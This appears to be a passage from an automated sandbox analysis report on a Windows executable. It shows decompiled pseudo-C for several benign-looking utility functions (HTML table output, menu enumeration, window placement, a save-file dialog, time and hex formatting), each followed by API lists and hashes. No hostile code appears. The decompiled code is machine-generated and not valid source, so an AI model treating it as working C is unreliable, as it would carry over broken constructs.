                                                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed int _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed int _v28;
                                                                                                  				void _v68;
                                                                                                  				char _v108;
                                                                                                  				void _v160;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t55;
                                                                                                  				void* _t57;
                                                                                                  				wchar_t* _t67;
                                                                                                  				intOrPtr* _t73;
                                                                                                  				signed int _t74;
                                                                                                  				signed int _t86;
                                                                                                  				signed int _t95;
                                                                                                  				intOrPtr* _t98;
                                                                                                  				void* _t100;
                                                                                                  				void* _t102;
                                                                                                  
                                                                                                  				_t73 = __ebx;
                                                                                                  				_t74 = 0xd;
                                                                                                  				_push(9);
                                                                                                  				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                  				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                  				_t102 = _t100 + 0x18;
                                                                                                  				asm("movsw");
                                                                                                  				E00407343(__ebx, _a4, L"<tr>");
                                                                                                  				_t95 = 0;
                                                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                  						_v8 = _t55;
                                                                                                  						_t57 =  &_v160;
                                                                                                  						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                  							_t57 =  &_v68;
                                                                                                  						}
                                                                                                  						_t98 = _a8;
                                                                                                  						_v28 = _v28 | 0xffffffff;
                                                                                                  						_v24 = _v24 | 0xffffffff;
                                                                                                  						_v20 = _v20 | 0xffffffff;
                                                                                                  						_v16 = _v16 & 0x00000000;
                                                                                                  						_v12 = _t57;
                                                                                                  						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                  						E0040ADC0(_v28,  &_v108);
                                                                                                  						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                  						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                  						_t67 =  *(_t73 + 0x64);
                                                                                                  						_t86 =  *_t67 & 0x0000ffff;
                                                                                                  						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                  							wcscat(_t67, L"&nbsp;");
                                                                                                  						}
                                                                                                  						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                  						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                  						_push( &_v108);
                                                                                                  						_push(_v12);
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t102 = _t102 + 0x1c;
                                                                                                  						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                  						_t95 = _t95 + 1;
                                                                                                  					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t73, _a4, L"\r\n");
                                                                                                  			}























                                                                                                  0x00407639
                                                                                                  0x00407646
                                                                                                  0x00407647
                                                                                                  0x00407654
                                                                                                  0x0040765f
                                                                                                  0x0040765f
                                                                                                  0x0040766b
                                                                                                  0x0040766d
                                                                                                  0x00407672
                                                                                                  0x00407677
                                                                                                  0x0040767d
                                                                                                  0x00407680
                                                                                                  0x00407686
                                                                                                  0x00407691
                                                                                                  0x00407697
                                                                                                  0x00407699
                                                                                                  0x00407699
                                                                                                  0x0040769c
                                                                                                  0x0040769f
                                                                                                  0x004076a3
                                                                                                  0x004076a7
                                                                                                  0x004076ab
                                                                                                  0x004076b5
                                                                                                  0x004076be
                                                                                                  0x004076c8
                                                                                                  0x004076de
                                                                                                  0x004076ee
                                                                                                  0x004076f1
                                                                                                  0x004076f4
                                                                                                  0x004076fa
                                                                                                  0x00407708
                                                                                                  0x0040770e
                                                                                                  0x00407718
                                                                                                  0x0040771d
                                                                                                  0x00407723
                                                                                                  0x00407724
                                                                                                  0x00407727
                                                                                                  0x0040772c
                                                                                                  0x0040772f
                                                                                                  0x00407734
                                                                                                  0x0040773f
                                                                                                  0x00407744
                                                                                                  0x00407745
                                                                                                  0x0040767d
                                                                                                  0x00407760

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscat
                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                  • API String ID: 384018552-4153097237
                                                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 42%
                                                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                  				struct tagMENUITEMINFOW _v0;
                                                                                                  				int _t24;
                                                                                                  				wchar_t* _t30;
                                                                                                  				intOrPtr _t32;
                                                                                                  				int _t34;
                                                                                                  				int _t42;
                                                                                                  				signed int _t47;
                                                                                                  				signed int _t48;
                                                                                                  
                                                                                                  				_t36 = __ecx;
                                                                                                  				_t48 = _t47 & 0xfffffff8;
                                                                                                  				E0040B550(0x203c, __ecx);
                                                                                                  				_t24 = GetMenuItemCount(_a8);
                                                                                                  				_t34 = _t24;
                                                                                                  				_t42 = 0;
                                                                                                  				if(_t34 <= 0) {
                                                                                                  					L13:
                                                                                                  					return _t24;
                                                                                                  				} else {
                                                                                                  					goto L1;
                                                                                                  				}
                                                                                                  				do {
                                                                                                  					L1:
                                                                                                  					memset( &_a50, 0, 0x2000);
                                                                                                  					_t48 = _t48 + 0xc;
                                                                                                  					_a36 =  &_a48;
                                                                                                  					_v0.cbSize = 0x30;
                                                                                                  					_a4 = 0x36;
                                                                                                  					_a40 = 0x1000;
                                                                                                  					_a16 = 0;
                                                                                                  					_a48 = 0;
                                                                                                  					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                  					if(_t24 == 0) {
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					if(_a48 == 0) {
                                                                                                  						L10:
                                                                                                  						_t56 = _a20;
                                                                                                  						if(_a20 != 0) {
                                                                                                  							_push(0);
                                                                                                  							_push(_a20);
                                                                                                  							_push(_a4);
                                                                                                  							_t24 = E0040605E(_t36, _t56);
                                                                                                  							_t48 = _t48 + 0xc;
                                                                                                  						}
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					_t30 = wcschr( &_a48, 9);
                                                                                                  					if(_t30 != 0) {
                                                                                                  						 *_t30 = 0;
                                                                                                  					}
                                                                                                  					_t31 = _a16;
                                                                                                  					if(_a20 != 0) {
                                                                                                  						if(_a12 == 0) {
                                                                                                  							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                  							_t32 =  *0x40fe20; // 0x0
                                                                                                  							_t31 = _t32 + 0x11558;
                                                                                                  							__eflags = _t32 + 0x11558;
                                                                                                  						} else {
                                                                                                  							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                  							_t31 = _t17;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_t24 = E00406025(_t31,  &_a48);
                                                                                                  					_pop(_t36);
                                                                                                  					goto L10;
                                                                                                  					L12:
                                                                                                  					_t42 = _t42 + 1;
                                                                                                  				} while (_t42 < _t34);
                                                                                                  				goto L13;
                                                                                                  			}











                                                                                                  0x0040605e
                                                                                                  0x00406061
                                                                                                  0x00406069
                                                                                                  0x00406074
                                                                                                  0x0040607a
                                                                                                  0x0040607e
                                                                                                  0x00406082
                                                                                                  0x00406148
                                                                                                  0x0040614e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00406088
                                                                                                  0x00406088
                                                                                                  0x00406093
                                                                                                  0x00406098
                                                                                                  0x0040609f
                                                                                                  0x004060ae
                                                                                                  0x004060b6
                                                                                                  0x004060be
                                                                                                  0x004060c6
                                                                                                  0x004060ca
                                                                                                  0x004060cf
                                                                                                  0x004060d7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004060de
                                                                                                  0x00406129
                                                                                                  0x00406129
                                                                                                  0x0040612d
                                                                                                  0x0040612f
                                                                                                  0x00406130
                                                                                                  0x00406134
                                                                                                  0x00406137
                                                                                                  0x0040613c
                                                                                                  0x0040613c
                                                                                                  0x00000000
                                                                                                  0x0040612d
                                                                                                  0x004060e7
                                                                                                  0x004060f0
                                                                                                  0x004060f2
                                                                                                  0x004060f2
                                                                                                  0x004060f9
                                                                                                  0x004060fd
                                                                                                  0x00406102
                                                                                                  0x0040610c
                                                                                                  0x00406112
                                                                                                  0x00406117
                                                                                                  0x00406117
                                                                                                  0x00406104
                                                                                                  0x00406104
                                                                                                  0x00406104
                                                                                                  0x00406104
                                                                                                  0x00406102
                                                                                                  0x00406122
                                                                                                  0x00406128
                                                                                                  0x00000000
                                                                                                  0x0040613f
                                                                                                  0x0040613f
                                                                                                  0x00406140
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                  • String ID: 0$6
                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E00402BEE(void* __ebx) {
                                                                                                  				int _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				int _v24;
                                                                                                  				int _v28;
                                                                                                  				void* _t27;
                                                                                                  				int _t31;
                                                                                                  				void* _t34;
                                                                                                  				int _t37;
                                                                                                  				int _t38;
                                                                                                  				int _t41;
                                                                                                  				int _t50;
                                                                                                  
                                                                                                  				_t34 = __ebx;
                                                                                                  				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                  					return _t27;
                                                                                                  				} else {
                                                                                                  					asm("movsd");
                                                                                                  					asm("movsd");
                                                                                                  					asm("movsd");
                                                                                                  					asm("movsd");
                                                                                                  					_v8 = GetSystemMetrics(0x4e);
                                                                                                  					_v12 = GetSystemMetrics(0x4f);
                                                                                                  					_t41 = GetSystemMetrics(0x4c);
                                                                                                  					_t31 = GetSystemMetrics(0x4d);
                                                                                                  					if(_v8 == 0 || _v12 == 0) {
                                                                                                  						_v8 = GetSystemMetrics(0);
                                                                                                  						_v12 = GetSystemMetrics(1);
                                                                                                  						_t41 = 0;
                                                                                                  						_t31 = 0;
                                                                                                  					} else {
                                                                                                  						_v8 = _v8 + _t41;
                                                                                                  						_v12 = _v12 + _t31;
                                                                                                  					}
                                                                                                  					_t50 = _v20 - _v28;
                                                                                                  					if(_t50 > 0x14) {
                                                                                                  						_t38 = _v24;
                                                                                                  						_t37 = _v16 - _t38;
                                                                                                  						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                  							_t31 = _t31 + 0xfffffff6;
                                                                                                  							if(_t38 >= _t31) {
                                                                                                  								_t31 = _v28;
                                                                                                  								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                  									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					return _t31;
                                                                                                  				}
                                                                                                  			}
















                                                                                                  0x00402bee
                                                                                                  0x00402bf8
                                                                                                  0x00402cae
                                                                                                  0x00402c08
                                                                                                  0x00402c10
                                                                                                  0x00402c11
                                                                                                  0x00402c12
                                                                                                  0x00402c13
                                                                                                  0x00402c20
                                                                                                  0x00402c27
                                                                                                  0x00402c2e
                                                                                                  0x00402c30
                                                                                                  0x00402c37
                                                                                                  0x00402c4b
                                                                                                  0x00402c50
                                                                                                  0x00402c53
                                                                                                  0x00402c55
                                                                                                  0x00402c3e
                                                                                                  0x00402c3e
                                                                                                  0x00402c41
                                                                                                  0x00402c41
                                                                                                  0x00402c5a
                                                                                                  0x00402c60
                                                                                                  0x00402c65
                                                                                                  0x00402c68
                                                                                                  0x00402c6d
                                                                                                  0x00402c77
                                                                                                  0x00402c7c
                                                                                                  0x00402c7e
                                                                                                  0x00402c87
                                                                                                  0x00402ca5
                                                                                                  0x00402ca5
                                                                                                  0x00402c87
                                                                                                  0x00402c7c
                                                                                                  0x00402c6d
                                                                                                  0x00000000
                                                                                                  0x00402cac

                                                                                                  APIs
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem$Window
                                                                                                  • String ID:
                                                                                                  • API String ID: 1155976603-0
                                                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004036D5(void* __edi, void* __eflags) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				char* _v24;
                                                                                                  				char _v28;
                                                                                                  				char* _v48;
                                                                                                  				intOrPtr _v56;
                                                                                                  				intOrPtr _v60;
                                                                                                  				int _v64;
                                                                                                  				int _v72;
                                                                                                  				intOrPtr _v76;
                                                                                                  				wchar_t* _v80;
                                                                                                  				intOrPtr _v84;
                                                                                                  				int _v92;
                                                                                                  				char* _v96;
                                                                                                  				intOrPtr _v104;
                                                                                                  				struct tagOFNA _v108;
                                                                                                  				void _v634;
                                                                                                  				long _v636;
                                                                                                  				void _v2682;
                                                                                                  				char _v2684;
                                                                                                  				void* __ebx;
                                                                                                  				char _t37;
                                                                                                  				intOrPtr _t38;
                                                                                                  				int _t46;
                                                                                                  				signed short _t54;
                                                                                                  
                                                                                                  				_v636 = 0;
                                                                                                  				memset( &_v634, 0, 0x208);
                                                                                                  				_v2684 = 0;
                                                                                                  				memset( &_v2682, 0, 0x7fe);
                                                                                                  				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                  				_v12 = _t37;
                                                                                                  				_t38 =  *0x40cbf0; // 0x67
                                                                                                  				_v8 = _t38;
                                                                                                  				_v28 = E00405B81(0x227);
                                                                                                  				_v24 = L"*.cfg";
                                                                                                  				_v20 = E00405B81(0x228);
                                                                                                  				_v16 = L"*.*";
                                                                                                  				E00405236( &_v2684,  &_v28);
                                                                                                  				_t54 = 0xa;
                                                                                                  				_v60 = E00405B81(_t54);
                                                                                                  				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                  				_v48 =  &_v12;
                                                                                                  				_v96 =  &_v2684;
                                                                                                  				_v108 = 0x4c;
                                                                                                  				_v92 = 0;
                                                                                                  				_v84 = 1;
                                                                                                  				_v80 =  &_v636;
                                                                                                  				_v76 = 0x104;
                                                                                                  				_v72 = 0;
                                                                                                  				_v64 = 0;
                                                                                                  				_v56 = 0x80806;
                                                                                                  				_t46 = GetSaveFileNameW( &_v108);
                                                                                                  				if(_t46 != 0) {
                                                                                                  					wcscpy( &_v636, _v80);
                                                                                                  					return E0040365E(__edi, 1,  &_v636);
                                                                                                  				}
                                                                                                  				return _t46;
                                                                                                  			}






























                                                                                                  0x004036ef
                                                                                                  0x004036f6
                                                                                                  0x0040370b
                                                                                                  0x00403712
                                                                                                  0x00403717
                                                                                                  0x0040371c
                                                                                                  0x0040371f
                                                                                                  0x0040372c
                                                                                                  0x00403735
                                                                                                  0x00403738
                                                                                                  0x00403744
                                                                                                  0x00403751
                                                                                                  0x00403758
                                                                                                  0x00403760
                                                                                                  0x00403769
                                                                                                  0x0040376c
                                                                                                  0x00403778
                                                                                                  0x0040377b
                                                                                                  0x0040378b
                                                                                                  0x00403792
                                                                                                  0x00403795
                                                                                                  0x00403798
                                                                                                  0x0040379b
                                                                                                  0x004037a2
                                                                                                  0x004037a5
                                                                                                  0x004037a8
                                                                                                  0x004037af
                                                                                                  0x004037b7
                                                                                                  0x004037c3
                                                                                                  0x00000000
                                                                                                  0x004037d4
                                                                                                  0x004037dc

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004036F6
                                                                                                  • memset.MSVCRT ref: 00403712
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                  • String ID: L$cfg
                                                                                                  • API String ID: 275899518-3734058911
                                                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                  				struct _SYSTEMTIME _v20;
                                                                                                  				long _v276;
                                                                                                  				long _v532;
                                                                                                  				FILETIME* _t15;
                                                                                                  
                                                                                                  				_t15 = __eax;
                                                                                                  				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                  					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                  						goto L5;
                                                                                                  					} else {
                                                                                                  						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                  						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                  						wcscpy(_a4,  &_v276);
                                                                                                  						wcscat(_a4, " ");
                                                                                                  						wcscat(_a4,  &_v532);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					L5:
                                                                                                  					wcscpy(_a4, 0x40c4e8);
                                                                                                  				}
                                                                                                  				return _a4;
                                                                                                  			}







                                                                                                  0x00404ed0
                                                                                                  0x00404edf
                                                                                                  0x00404ef6
                                                                                                  0x00000000
                                                                                                  0x00404f00
                                                                                                  0x00404f1c
                                                                                                  0x00404f31
                                                                                                  0x00404f41
                                                                                                  0x00404f4e
                                                                                                  0x00404f5d
                                                                                                  0x00404f66
                                                                                                  0x00404f69
                                                                                                  0x00404f69
                                                                                                  0x00404f71
                                                                                                  0x00404f77
                                                                                                  0x00404f7d

                                                                                                  APIs
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1331804452-0
                                                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 71%
                                                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                  				void _v514;
                                                                                                  				long _v516;
                                                                                                  				wchar_t* _t34;
                                                                                                  				signed int _t35;
                                                                                                  				void* _t36;
                                                                                                  				void* _t37;
                                                                                                  
                                                                                                  				_t34 = __edi;
                                                                                                  				_v516 = _v516 & 0x00000000;
                                                                                                  				memset( &_v514, 0, 0x1fc);
                                                                                                  				 *__edi =  *__edi & 0x00000000;
                                                                                                  				_t37 = _t36 + 0xc;
                                                                                                  				_t35 = 0;
                                                                                                  				do {
                                                                                                  					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                  					_push(L"%2.2X");
                                                                                                  					_push(0xff);
                                                                                                  					_push( &_v516);
                                                                                                  					L0040B1EC();
                                                                                                  					_t37 = _t37 + 0x10;
                                                                                                  					if(_t35 > 0) {
                                                                                                  						wcscat(_t34, " ");
                                                                                                  					}
                                                                                                  					if(_a8 > 0) {
                                                                                                  						asm("cdq");
                                                                                                  						if(_t35 % _a8 == 0) {
                                                                                                  							wcscat(_t34, L"  ");
                                                                                                  						}
                                                                                                  					}
                                                                                                  					wcscat(_t34,  &_v516);
                                                                                                  					_t35 = _t35 + 1;
                                                                                                  				} while (_t35 < 0x80);
                                                                                                  				return _t34;
                                                                                                  			}









                                                                                                  0x00404fe0
                                                                                                  0x00404fe9
                                                                                                  0x00405000
                                                                                                  0x00405005
                                                                                                  0x00405009
                                                                                                  0x0040500c
                                                                                                  0x0040500e
                                                                                                  0x00405015
                                                                                                  0x00405016
                                                                                                  0x00405021
                                                                                                  0x00405026
                                                                                                  0x00405027
                                                                                                  0x0040502c
                                                                                                  0x00405031
                                                                                                  0x00405039
                                                                                                  0x0040503f
                                                                                                  0x00405044
                                                                                                  0x00405048
                                                                                                  0x0040504e
                                                                                                  0x00405056
                                                                                                  0x0040505c
                                                                                                  0x0040504e
                                                                                                  0x00405065
                                                                                                  0x0040506a
                                                                                                  0x00405072
                                                                                                  0x00405079

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2521778956-791839006
                                                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 42%
